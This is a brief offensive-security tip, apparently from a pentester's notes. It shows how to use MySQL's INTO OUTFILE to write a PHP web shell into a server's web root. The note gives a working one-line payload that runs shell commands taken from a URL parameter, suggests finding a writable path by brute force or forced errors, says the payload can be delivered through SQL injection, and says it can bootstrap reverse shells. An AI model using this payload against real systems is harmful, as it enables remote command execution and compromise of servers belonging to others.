author: Nathan Acks
You can “upload” reverse shells using MySQL using
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/cmd.php';
The path may require some brute-forcing or additional reconnaissance; sometimes you can force an error to return a (potentially) writeable path. Depending on how the application you’re attacking is configured, it may be possible to exploit this via SQLi.
This can be used to bootstrap reverse shells.